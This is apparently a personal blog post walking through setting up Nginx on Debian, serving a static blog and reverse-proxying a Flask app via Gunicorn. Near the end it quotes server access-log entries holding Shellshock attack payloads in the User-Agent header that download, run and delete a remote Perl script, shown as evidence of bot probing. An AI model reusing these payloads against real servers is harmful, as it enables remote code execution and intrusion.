An accounting of my attempts to set up Nginx, Flask, and the mess that I call my corner of the internet.
It seems a theme for this whole blog might be: repackaging information you could find somewhere else. In keeping with that theme I'll be writing-up how I set up Nginx and this site in general; all in an effort to document some of the sticking points I experienced and commit it to memory.
There's a variety of resources available online on how to configure Nginx. The official documentation is okay, but like most project documentation the tone was a bit over my head as I just began things. There are plenty of people who've gone to the trouble of documenting how they've set up Nginx or Flask, or any number of frameworks and configurations, the trouble I found was that none were either exactly what I wanted or were out of date with the most recent changes to the different parts of the web stack. So what's one more voice chiming in with an unasked opinion? To the best of my knowledge these notes are accurate as of the post date.
Though I didn't think to check at the time, I think it's probably best to ensure Nginx is up-to-date before anything else. A downside to running Debian stable on the server is that some packages can lag the more recent changes, which isn't necessarily an issue but in the case of a web server like Nginx there were several security fixes that the packaged version did not have. So I drew it in from an available backport:
Adding the line:
deb <http://security.debian.org/> wheezy/updates main
to /etc/apt/sources.list
and then installing with:
apt-get -t wheezy-backports install nginx
where the -t
flag is for a target release. Which, in my case, brought my
system up to 1.6.2
to account for
CVE-2014-3616.
Nginx is pretty liberal in the configurations which it will happily accept,
which meant I initially had a rather poorly thought out nginx.conf
file
peppered with all manner of
server blocks and directives. I
quickly ran into the headaches associated with managing the configuration for
several subdomains from a single config file though and found my way to the
sites-available
and sites-enabled
directory structure advised by the Nginx
documentation.
As an example of my current configuration, I've set up the subdomain for this
blog in a file, idle.nprescott.com
, in the sites-available
directory as
follows:
server {
listen 80;
root /home/nolan/idle;
index index.html index.htm index.nginx-debian.html;
server_name idle.nprescott.com www.idle.nprescott.com;
location / {
try_files $uri $uri/ =404;
}
}
Which means I can sync the entire output directory generated by
Frog into a single directory on my
server 1. The sites-available
is symlinked into the sites-enabled
directory with the following:
ln -s idle.nprescott.com ../sites-enabled/idle.nprescott.com
With the server properly configured it is important to configure the DNS records for the new subdomain (which I touched on in this post). The major takeaway in my case was to ensure I had set:
CNAME * nprescott.com
Which effectively defers the various subdomain routing to Nginx's server block configurations, as seen above.
Also on the subject of DNS setup, one thing that was very much set-and-forget was the A record for my entire site. The A record is the address record responsible for routing traffic from my domain name to the server's IP address. Just for kicks you can also browse my home page at http://107.170.216.189/.
I haven't yet given much thought to the breakdown for subdomains vs. regular addressing on my site - I'm told subdomains can (temporarily) confuse SEO efforts (or hurt existing rankings). I can safely say that's not something I'm worried about at this time.
Slightly more difficult than serving static resources through Nginx was
configuring the web server to reverse proxy an application server such as
Gunicorn. To reverse proxy Gunicorn for glue-boy,
a Flask application, I have the following configuration file in
sites-available
:
server {
listen 80;
server_name glue.nprescott.com www.glue.nprescott.com;
root /home/nolan/glue-boy;
access_log /home/nolan/glue-boy/logs/access.log;
error_log /home/nolan/glue-boy/logs/error.log;
location / {
proxy_pass http://127.0.0.1:8000;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
}
}
Which I use in conjunction with Gunicorn, kicked off with:
gunicorn -w=4 --bind=localhost:8000 glue-boy:app \
--log-file /home/nolan/glue-boy/logs/gunicorn.log --daemon
While this blog is entirely static content, the web applications I've spoken about above do present a larger attack surface for the various bad actors of the internet. A cursory glance through the server logs gives some idea to the sheer number of jerks trying to ruin my day 2:
$ sed -n '/perl/p' access.log | curl -F "content=<-" http://glue.nprescott.com
91.202.104.5 - - [17/Feb/2015:11:12:18 +0000] "GET / HTTP/1.1" 200 1504 "-" "()\
{ :;};/usr/bin/perl -e 'print \x22Content-Type:\
text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
[webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
[webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
/tmp/b.pl*\x22);'"
...
...
107.170.243.205 - - [18/Feb/2015:02:18:48 +0000] "GET /cgi-bin/sat-ir-web.pl\
HTTP/1.1" 404 134 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type:\
text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
[webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
[webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
/tmp/b.pl*\x22);'"
...
...
On and on, sometimes hundreds of request in the span of minutes. I've given some thought to building a system to periodically log these request and the IPs from which they originate in order to blacklist them, along the lines of a bot blackhole. There's also the opportunity to draw some kind of metrics from the logs, I don't much care about those "metrics" derived from things like Google Analytics (which I don't bother with), but it could be passingly interesting (or depressing) to visualize the number of (seemingly) human request to bot requests.
scp
the whole output directory to the server, I think rsync
might be smarter in terms of skipping unchanged files